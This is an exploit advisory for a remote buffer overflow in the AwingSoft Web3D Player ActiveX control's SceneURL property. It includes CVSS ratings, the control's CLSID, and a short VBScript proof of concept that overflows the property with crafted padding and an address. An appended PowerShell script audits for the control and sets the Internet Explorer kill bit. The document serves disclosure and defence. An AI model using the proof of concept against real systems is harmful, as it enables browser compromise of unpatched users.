AwingSoft Web3D Player (WindsPly.ocx) "SceneURL()" Remote Buffer Overflow

2010-01-07 / 2010-01-08
Credit: shinnai
Risk: High
Local: No
Remote: Yes
CWE: CWE-119


CVSS Base Score: 9.3/10
Impact Subscore: 10/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: Not required
Confidentiality impact: Complete
Integrity impact: Complete
Availability impact: Complete

-----------------------------------------------------------------------------
 AwingSoft Web3D Player (WindsPly.ocx) "SceneURL()" Remote Buffer Overflow
 url: http://www.awingsoft.com/

 Author: shinnai
 mail: shinnai[at]autistici[dot]org
 site: http://www.shinnai.net/

 Dedicated to aaannamariaaa :D

 This was written for educational purposes. Use it at your own risk.
 Author will not be responsible for any damage.

 File:   WindsPly.ocx
 Ver.:   <= 3.5.0.0
 GUID:   {17A54E7D-A9D4-11D8-9552-00E04CB09903}
 ProgID: WindsPlayerIE.View.1

 Marked as:
 RegKey Safe for Script: Falso
 RegKey Safe for Init: Falso
 Implements IObjectSafety: Vero
 IDisp Safe: Safe for untrusted: caller,data
 IPersist Safe: Safe for untrusted: caller,data
 IPStorage Safe: Safe for untrusted: caller,data

 Tested on Windows XP Professional SP3 all patched, with Internet Explorer 8
-----------------------------------------------------------------------------
<object classid='clsid:17A54E7D-A9D4-11D8-9552-00E04CB09903' id='test'></object>
<script language='vbscript'>
 buff = String(8704, "A")
 mReg = unescape("bbbb")
 mExc = unescape("%00%00%01%00") 'Memory address: 00010000 Access: RW
 buf1 = String(88, "c")
 buf2 = String(47284, "D")

 test.SceneURL = buff + mReg + mExc + buf1 + buf2
</script>

References:

http://xforce.iss.net/xforce/xfdb/51672
http://www.shinnai.net/exploits/nsGUdeley3EHfKEV690p.txt
http://www.milw0rm.com/exploits/9116
http://secunia.com/advisories/35764
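
A defensive check for the control identified in the advisory, as an added example that is not part of the original advisory: it reports whether the CLSID is registered and which file version backs it, and with -Apply sets the Internet Explorer kill bit (Compatibility Flags 0x400) so IE refuses to instantiate the control. The -Apply switch and the variable names are assumptions of this example; the CLSID and the affected version range come from the advisory.

```powershell
# Added example: audit and kill-bit the WindsPly.ocx ActiveX control.
# Run elevated. Without -Apply the script only reports.
param([switch]$Apply)

$Clsid   = '{17A54E7D-A9D4-11D8-9552-00E04CB09903}'  # GUID from the advisory
$KillBit = 0x400                                     # IE kill bit flag

# 1. Is the control registered (native and 32-bit views), and which file backs it?
foreach ($root in 'HKLM:\SOFTWARE\Classes\CLSID',
                  'HKLM:\SOFTWARE\Wow6432Node\Classes\CLSID') {
    $server = "$root\$Clsid\InprocServer32"
    if (-not (Test-Path -LiteralPath $server)) { continue }
    $file = [string](Get-Item -LiteralPath $server).GetValue('')
    $file = [Environment]::ExpandEnvironmentVariables($file.Trim('"'))
    $ver  = 'file not found'
    if ($file -and (Test-Path -LiteralPath $file)) {
        $ver = (Get-Item -LiteralPath $file).VersionInfo.FileVersion
    }
    # The advisory lists versions <= 3.5.0.0 as affected.
    "Registered: $file (version: $ver)"
}

# 2. Report, and optionally set, the kill bit in both registry views.
foreach ($root in 'HKLM:\SOFTWARE\Microsoft',
                  'HKLM:\SOFTWARE\Wow6432Node\Microsoft') {
    if (-not (Test-Path -LiteralPath $root)) { continue }
    $key   = "$root\Internet Explorer\ActiveX Compatibility\$Clsid"
    $flags = 0
    if (Test-Path -LiteralPath $key) {
        $cur = (Get-Item -LiteralPath $key).GetValue('Compatibility Flags')
        if ($null -ne $cur) { $flags = [int]$cur }
    }
    $set = ($flags -band $KillBit) -ne 0
    "{0}: kill bit {1}" -f $key, $(if ($set) { 'set' } else { 'NOT set' })

    if ($Apply -and -not $set) {
        # Create the key only if missing; New-Item -Force on an existing
        # key would discard values already stored there.
        if (-not (Test-Path -LiteralPath $key)) {
            New-Item -Path $key -Force | Out-Null
        }
        # Preserve any existing flags and add the kill bit.
        New-ItemProperty -LiteralPath $key -Name 'Compatibility Flags' `
            -PropertyType DWord -Value ($flags -bor $KillBit) -Force | Out-Null
        "  -> kill bit written"
    }
}
```

The kill bit only stops Internet Explorer and other hosts that honour it from loading the control; the vulnerable file stays on disk until it is uninstalled or updated.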

